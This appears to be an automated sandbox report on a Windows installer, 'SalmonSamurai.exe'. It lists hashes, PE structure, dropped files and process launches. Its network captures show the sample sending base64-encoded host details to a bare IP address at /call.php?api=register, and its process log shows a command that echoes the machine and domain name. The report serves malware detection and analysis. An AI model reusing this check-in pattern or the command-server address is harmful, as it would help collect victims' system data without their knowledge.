                                                                                                                                                                                                                                              SHA1:BC9C862FD01F6134A0514DCB63F9FAB7A61CE269
                                                                                                                                                                                                                                              SHA-256:5B2FFB78FA963F2DEA5A7FCF7676FC3ABA243C4372D7528C8F1FC8F726D0A3FA
                                                                                                                                                                                                                                              SHA-512:422A18AF294D7551224E05F5F4F5DCFA51B3455C2E61FC285FD2B95B50274EB77FF317647E17B0E7D47459B4FED19C7C88C90E0878F2269A78D598B1196401D8
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):106
                                                                                                                                                                                                                                              Entropy (8bit):4.724752649036734
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                              MD5:8642DD3A87E2DE6E991FAE08458E302B
                                                                                                                                                                                                                                              SHA1:9C06735C31CEC00600FD763A92F8112D085BD12A
                                                                                                                                                                                                                                              SHA-256:32D83FF113FEF532A9F97E0D2831F8656628AB1C99E9060F0332B1532839AFD9
                                                                                                                                                                                                                                              SHA-512:F5D37D1B45B006161E4CEFEEBBA1E33AF879A3A51D16EE3FF8C3968C0C36BBAFAE379BF9124C13310B77774C9CBB4FA53114E83F5B48B5314132736E5BB4496F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:{"file_format_version": "1.0.0", "ICD": {"library_path": ".\\vk_swiftshader.dll", "api_version": "1.0.5"}}
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):928256
                                                                                                                                                                                                                                              Entropy (8bit):6.558092096809165
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                              MD5:6D4ADF9A48DBCE2E480EF10B1338CA3C
                                                                                                                                                                                                                                              SHA1:CEB77D5768C6EDA84EC8E0B43821B8027764DE81
                                                                                                                                                                                                                                              SHA-256:4CCA7E6C05B2D988926E4B4D0C8FF91D6356F18DE8BF40B440251180E5CAD6A7
                                                                                                                                                                                                                                              SHA-512:106DB7309B40AFABB1CCA911B204C83129683DC116AEC198568C4228C581BF0DE5963BFFC0B50DF8F43EC355264F271FC383F4155BE45350C0D7DD429C7F7F09
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):389
                                                                                                                                                                                                                                              Entropy (8bit):5.6318132694527545
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                              MD5:6A619119F13B7766B9ED68F9AA7878EB
                                                                                                                                                                                                                                              SHA1:2DE66EB96438BAAF1EF8D635DD9404D8FFFC0373
                                                                                                                                                                                                                                              SHA-256:BC170FF59B3712830DCFBD62033A20E764CE858AF84FA07E32E69ABC822C6511
                                                                                                                                                                                                                                              SHA-512:52BF9CEB90B0EB3ED7AD4DACC56C1947999A3159376B754B1CFFED4ACE8287F341DE1A2519F92A0BC05C132498B8EBBA93A390176F40FE401D889F060D65A348
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:{"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABk6En8A6d4SqadlGxeRsyOAAAAAAIAAAAAABBmAAAAAQAAIAAAACEy0gO9+YbExzwNhIQqwDHwlKYBbMRi6/ZL2H3Y0U1QAAAAAA6AAAAAAgAAIAAAAC3qn9HZ/UbF3OXv4bzOb3U/MlLT1c86HVEAkBLCohZhMAAAAHMo+96cyS8Pmen/ZeM8Hy9oyyTjjxpyuvKjP+G98MTlfw0gzc2VYGP+jnxSkoTYM0AAAADgL12wdsnB1ku7Yyr5iu29Gs/zmJDQ80jh2ggmmOznak7JI/WkCPZ/DJ6EaeVqFYnz6FflVUeVtrLB6VarpA9K"}}
                                                                                                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                                                              Entropy (8bit):7.999986641840123
                                                                                                                                                                                                                                              TrID:
                                                                                                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                              File name:SalmonSamurai.exe
                                                                                                                                                                                                                                              File size:74'023'200 bytes
                                                                                                                                                                                                                                              MD5:4ce4a1f912d0b9840a7f568454c6c45a
                                                                                                                                                                                                                                              SHA1:bbf41f3dee85e038f1cb4965269bb0f06b3bb27a
                                                                                                                                                                                                                                              SHA256:83679dfd6331a0a0d829c0f3aed5112b69a7024ff1ceebf7179ba5c2b4d21fc5
                                                                                                                                                                                                                                              SHA512:1583c31d11bf6d89e801398094222b6600cb610cffaed714e95415e887d31091dff0a386cec67ec0b23d519f5a662d899eb51533aff7327fbe7284573a904d2a
                                                                                                                                                                                                                                              SSDEEP:1572864:FQUvSCC8EhkQ2eCwxbjOcs1ecd3vXqL/PI2FS/oah2O:F54FhAsO11ec5yL/N0oah2O
                                                                                                                                                                                                                                              TLSH:8FF73366AFBD64C1F87330F5054A3993FB1A1B574B09EA3588F8BD9B049899C4F81E13
                                                                                                                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN..s~..PN..VH..PN.Rich.PN.........................PE..L....C.f.................h...".....
                                                                                                                                                                                                                                              Icon Hash:adaeb397f36b6331
                                                                                                                                                                                                                                              Entrypoint:0x403665
                                                                                                                                                                                                                                              Entrypoint Section:.text
                                                                                                                                                                                                                                              Digitally signed:true
                                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                                                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                              Time Stamp:0x660843F7 [Sat Mar 30 16:55:19 2024 UTC]
                                                                                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                                                                                              OS Version Major:4
                                                                                                                                                                                                                                              OS Version Minor:0
                                                                                                                                                                                                                                              File Version Major:4
                                                                                                                                                                                                                                              File Version Minor:0
                                                                                                                                                                                                                                              Subsystem Version Major:4
                                                                                                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                                                                                                              Import Hash:9dda1a1d1f8a1d13ae0297b47046b26e
                                                                                                                                                                                                                                              Signature Valid:true
                                                                                                                                                                                                                                              Signature Issuer:CN=GlobalSign GCC R45 EV CodeSigning CA 2020, O=GlobalSign nv-sa, C=BE
                                                                                                                                                                                                                                              Signature Validation Error:The operation completed successfully
                                                                                                                                                                                                                                              Error Number:0
                                                                                                                                                                                                                                              Not Before, Not After
                                                                                                                                                                                                                                              • 14/12/2024 08:21:02 06/12/2025 09:00:54
                                                                                                                                                                                                                                              Subject Chain
                                                                                                                                                                                                                                              • CN=ELEFAR LLC, O=ELEFAR LLC, STREET="ul Polyany, 5A / korpus 1 pomeshch 7n", L=Moscow, S=Moscow, C=RU, OID.1.3.6.1.4.1.311.60.2.1.2=Moscow, OID.1.3.6.1.4.1.311.60.2.1.3=RU, SERIALNUMBER=1217700082577, OID.2.5.4.15=Private Organization
                                                                                                                                                                                                                                              Version:3
                                                                                                                                                                                                                                              Thumbprint MD5:3339AD8CCE8923C682D0E416361BF47B
                                                                                                                                                                                                                                              Thumbprint SHA-1:901F3FE4E599CD155132CE2B6BF3C5F6D1E0387C
                                                                                                                                                                                                                                              Thumbprint SHA-256:043C75759AB9230C929F661168CA533CC92EDF88D480EAFF3DCEB04C6BFC6AC4
                                                                                                                                                                                                                                              Serial:301385AA36FAE635E74BB88E
                                                                                                                                                                                                                                              Instruction
                                                                                                                                                                                                                                              sub esp, 000003F8h
                                                                                                                                                                                                                                              push ebp
                                                                                                                                                                                                                                              push esi
                                                                                                                                                                                                                                              push edi
                                                                                                                                                                                                                                              push 00000020h
                                                                                                                                                                                                                                              pop edi
                                                                                                                                                                                                                                              xor ebp, ebp
                                                                                                                                                                                                                                              push 00008001h
                                                                                                                                                                                                                                              mov dword ptr [esp+20h], ebp
                                                                                                                                                                                                                                              mov dword ptr [esp+18h], 0040A230h
                                                                                                                                                                                                                                              mov dword ptr [esp+14h], ebp
                                                                                                                                                                                                                                              call dword ptr [004080A0h]
                                                                                                                                                                                                                                              mov esi, dword ptr [004080A4h]
                                                                                                                                                                                                                                              lea eax, dword ptr [esp+34h]
                                                                                                                                                                                                                                              push eax
                                                                                                                                                                                                                                              mov dword ptr [esp+4Ch], ebp
                                                                                                                                                                                                                                              mov dword ptr [esp+0000014Ch], ebp
                                                                                                                                                                                                                                              mov dword ptr [esp+00000150h], ebp
                                                                                                                                                                                                                                              mov dword ptr [esp+38h], 0000011Ch
                                                                                                                                                                                                                                              call esi
                                                                                                                                                                                                                                              test eax, eax
                                                                                                                                                                                                                                              jne 00007F7F9D30086Ah
                                                                                                                                                                                                                                              lea eax, dword ptr [esp+34h]
                                                                                                                                                                                                                                              mov dword ptr [esp+34h], 00000114h
                                                                                                                                                                                                                                              push eax
                                                                                                                                                                                                                                              call esi
                                                                                                                                                                                                                                              mov ax, word ptr [esp+48h]
                                                                                                                                                                                                                                              mov ecx, dword ptr [esp+62h]
                                                                                                                                                                                                                                              sub ax, 00000053h
                                                                                                                                                                                                                                              add ecx, FFFFFFD0h
                                                                                                                                                                                                                                              neg ax
                                                                                                                                                                                                                                              sbb eax, eax
                                                                                                                                                                                                                                              mov byte ptr [esp+0000014Eh], 00000004h
                                                                                                                                                                                                                                              not eax
and eax, ecx
mov word ptr [esp+00000148h], ax
cmp dword ptr [esp+38h], 0Ah
jnc 00007F7F9D300838h
and word ptr [esp+42h], 0000h
mov eax, dword ptr [esp+40h]
movzx ecx, byte ptr [esp+3Ch]
mov dword ptr [00429B18h], eax
xor eax, eax
mov ah, byte ptr [esp+38h]
movzx eax, ax
or eax, ecx
xor ecx, ecx
mov ch, byte ptr [esp+00000148h]
movzx ecx, cx
shl eax, 10h
or eax, ecx
movzx ecx, byte ptr [esp+0000004Eh]

Programming Language:
• [EXP] VC++ 6.0 SP5 build 8804

Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x84fc           0xa0          .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x46000          0xbff0        .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x4695db8        0x2368
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x0              0x0
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x8000           0x2a8         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type  Entropy            Characteristics
.text   0x1000           0x66d7        0x6800    4e97e586f167bf2d2eddcdba22e25c0e  False     0.6615835336538461  data       6.441769857560007  IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata  0x8000           0x1358        0x1400    bd82d08a08da8783923a22b467699302  False     0.4431640625        data       5.103358601944578  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data   0xa000           0x1fb78       0x600     e411b225ac3cd03a5dad8143ae82958d  False     0.5091145833333334  data       4.122928093833695  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata  0x2a000          0x1c000       0x0       d41d8cd98f00b204e9800998ecf8427e  False     0                   empty      0.0                IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc   0x46000          0xbff0        0xc000    951d482944a10118ca7b1c23ecd70b02  False     0.7726847330729166  data       6.87682750773503   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Name           RVA      Size    Type                                                                                 Language  Country        ZLIB Complexity
RT_ICON        0x462b0  0x8f8d  PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced                          English   United States  0.9947209447876133
RT_ICON        0x4f240  0xea8   data                                                                                 English   United States  0.007196162046908316
RT_ICON        0x500e8  0x8a8   data                                                                                 English   United States  0.01128158844765343
RT_ICON        0x50990  0x568   data                                                                                 English   United States  0.014450867052023121
RT_ICON        0x50ef8  0x468   data                                                                                 English   United States  0.015957446808510637
RT_ICON        0x51360  0x2e8   data                                                                                 English   United States  0.020161290322580645
RT_ICON        0x51648  0x128   data                                                                                 English   United States  0.04391891891891892
RT_DIALOG      0x51770  0x202   data                                                                                 English   United States  0.4085603112840467
RT_DIALOG      0x51978  0xf8    data                                                                                 English   United States  0.6290322580645161
RT_DIALOG      0x51a70  0xee    data                                                                                 English   United States  0.6302521008403361
RT_GROUP_ICON  0x51b60  0x68    data                                                                                 English   United States  0.23076923076923078
RT_MANIFEST    0x51bc8  0x423   XML 1.0 document, ASCII text, with very long lines (1059), with no line terminators  English   United States  0.5127478753541076

DLL           Import
ADVAPI32.dll  RegEnumValueW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegCreateKeyExW
SHELL32.dll   SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW, ShellExecuteExW
ole32.dll     CoCreateInstance, OleUninitialize, OleInitialize, IIDFromString, CoTaskMemFree
COMCTL32.dll  ImageList_Destroy, ImageList_AddMasked, ImageList_Create
USER32.dll    MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, CreatePopupMenu, AppendMenuW, TrackPopupMenu, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, IsWindowEnabled, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CharPrevW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, CharNextA, wsprintfA, DispatchMessageW, CreateWindowExW, PeekMessageW, GetSystemMetrics
GDI32.dll     GetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor
KERNEL32.dll  RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, WriteFile, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, Sleep, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, MulDiv, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, CopyFileW

Language of compilation system  Country where language is spoken  Map
English                         United States

Timestamp  Source Port  Dest Port  Source IP  Dest IP
                                                                                                                                                                                                                                              Dec 23, 2024 16:54:33.685856104 CET804985389.187.28.253192.168.2.7
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 23, 2024 16:52:01.238966942 CET | 61378 | 53 | 192.168.2.7 | 1.1.1.1
Dec 23, 2024 16:52:01.239322901 CET | 55096 | 53 | 192.168.2.7 | 1.1.1.1
Dec 23, 2024 16:52:01.375930071 CET | 53 | 61378 | 1.1.1.1 | 192.168.2.7
Dec 23, 2024 16:52:01.376296043 CET | 53 | 55096 | 1.1.1.1 | 192.168.2.7

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 23, 2024 16:52:01.238966942 CET | 192.168.2.7 | 1.1.1.1 | 0xd9d4 | Standard query (0) | chrome.cloudflare-dns.com | A (IP address) | IN (0x0001) | false
Dec 23, 2024 16:52:01.239322901 CET | 192.168.2.7 | 1.1.1.1 | 0xe760 | Standard query (0) | chrome.cloudflare-dns.com | 65 | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 23, 2024 16:52:01.375930071 CET | 1.1.1.1 | 192.168.2.7 | 0xd9d4 | No error (0) | chrome.cloudflare-dns.com | | 172.64.41.3 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 16:52:01.375930071 CET | 1.1.1.1 | 192.168.2.7 | 0xd9d4 | No error (0) | chrome.cloudflare-dns.com | | 162.159.61.3 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 16:52:01.376296043 CET | 1.1.1.1 | 192.168.2.7 | 0xe760 | No error (0) | chrome.cloudflare-dns.com | | | 65 | IN (0x0001) | false
                                                                                                                                                                                                                                              • chrome.cloudflare-dns.com
                                                                                                                                                                                                                                              • 89.187.28.253
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49853 | 89.187.28.253 | 80 | 3964 | C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe

Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                              Dec 23, 2024 16:52:31.943883896 CET636OUTGET /call.php?api=register&username=cmVwb3J0&userdata=OCBHQl9mYWxzZV8zV1JTTF90cnVlX0RQU19YSV9XaW5kb3dzIDEwIFByb185NiBtaW51dGVzICgwLjYwIGhvdXJzKV9DOlxVc2Vyc1xmcm9udGRlc2tfNTcxMzQ1X2Zyb250ZGVza19XaW5kb3dzX05UX3g2NF8xMC4wLjE5MDQ1X0M6XFVzZXJzXGZyb250ZGVza1xBcHBEYXRhXFJvYW1pbmdfQzpcVXNlcnNcRlJPTlREfjFcQXBwRGF0YVxMb2NhbFxUZW1wX0ZST05UREVTSy1QQ19fSW50ZWw2NCBGYW1pbHkgNiBNb2RlbCAxNDMgU3RlcHBpbmcgOCwgR2VudWluZUludGVsX0FNRDY0X0M6XzJfQzpcVXNlcnNcZnJvbnRkZXNrXEFwcERhdGFcUm9hbWluZ1xOc2lzRXh0cmFjdGVkXFNhbG1vblNhbXVyYWkuZXhl HTTP/1.1
                                                                                                                                                                                                                                              Accept: application/json, text/plain, */*
                                                                                                                                                                                                                                              User-Agent: axios/0.27.2
                                                                                                                                                                                                                                              Host: 89.187.28.253
                                                                                                                                                                                                                                              Connection: close
Dec 23, 2024 16:52:33.343441963 CET | 321 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                              Date: Mon, 23 Dec 2024 15:52:33 GMT
                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                              Content-Length: 162
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
Dec 23, 2024 16:53:33.440970898 CET | 6 | OUT | Data Raw: 00
Data Ascii:
Dec 23, 2024 16:54:33.566165924 CET | 6 | OUT | Data Raw: 00
Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49782 | 172.64.41.3 | 443 | 2520 | C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-23 15:52:02 UTC | 245 | OUT | POST /dns-query HTTP/1.1
                                                                                                                                                                                                                                              Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              Content-Length: 128
                                                                                                                                                                                                                                              Accept: application/dns-message
                                                                                                                                                                                                                                              Accept-Language: *
                                                                                                                                                                                                                                              User-Agent: Chrome
                                                                                                                                                                                                                                              Accept-Encoding: identity
                                                                                                                                                                                                                                              Content-Type: application/dns-message
2024-12-23 15:52:02 UTC | 128 | OUT
                                                                                                                                                                                                                                              Data Ascii: wwwgstaticcom)TP
2024-12-23 15:52:03 UTC | 247 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              Date: Mon, 23 Dec 2024 15:52:02 GMT
                                                                                                                                                                                                                                              Content-Type: application/dns-message
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                              Content-Length: 468
                                                                                                                                                                                                                                              CF-RAY: 8f698439fb594273-EWR
                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
2024-12-23 15:52:03 UTC | 468 | IN
                                                                                                                                                                                                                                              Data Ascii: wwwgstaticcom()


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49783 | 172.64.41.3 | 443 | 2520 | C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-23 15:52:03 UTC | 245 | OUT | POST /dns-query HTTP/1.1
                                                                                                                                                                                                                                              Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              Content-Length: 128
                                                                                                                                                                                                                                              Accept: application/dns-message
                                                                                                                                                                                                                                              Accept-Language: *
                                                                                                                                                                                                                                              User-Agent: Chrome
                                                                                                                                                                                                                                              Accept-Encoding: identity
                                                                                                                                                                                                                                              Content-Type: application/dns-message
2024-12-23 15:52:03 UTC | 128 | OUT
                                                                                                                                                                                                                                              Data Ascii: wwwgstaticcom)TP


Target ID: 0
Start time: 10:51:17
Start date: 23/12/2024
Path: C:\Users\user\Desktop\SalmonSamurai.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\SalmonSamurai.exe"
Imagebase: 0x400000
File size: 74'023'200 bytes
MD5 hash: 4CE4A1F912D0B9840A7F568454C6C45A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 9
Start time: 12:24:25
Start date: 23/12/2024
Path: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe
Wow64 process (32bit): false
Commandline: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe
Imagebase: 0x7ff752ef0000
File size: 160'143'360 bytes
MD5 hash: 6EA18AE76085155E2681CCA92745A9AF
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:11
                                                                                                                                                                                                                                              Start time:12:24:27
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /d /s /c "chcp"
                                                                                                                                                                                                                                              Imagebase:0x7ff6d8bd0000
                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:12
                                                                                                                                                                                                                                              Start time:12:24:27
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:13
                                                                                                                                                                                                                                              Start time:12:24:27
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\chcp.com
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:chcp
                                                                                                                                                                                                                                              Imagebase:0x7ff7edd20000
                                                                                                                                                                                                                                              File size:14'848 bytes
                                                                                                                                                                                                                                              MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:14
                                                                                                                                                                                                                                              Start time:12:24:27
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /d /s /c "echo %COMPUTERNAME%.%USERDNSDOMAIN%"
                                                                                                                                                                                                                                              Imagebase:0x7ff6d8bd0000
                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:15
                                                                                                                                                                                                                                              Start time:12:24:27
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:16
                                                                                                                                                                                                                                              Start time:12:24:27
                                                                                                                                                                                                                                              Start date:23/12/2024
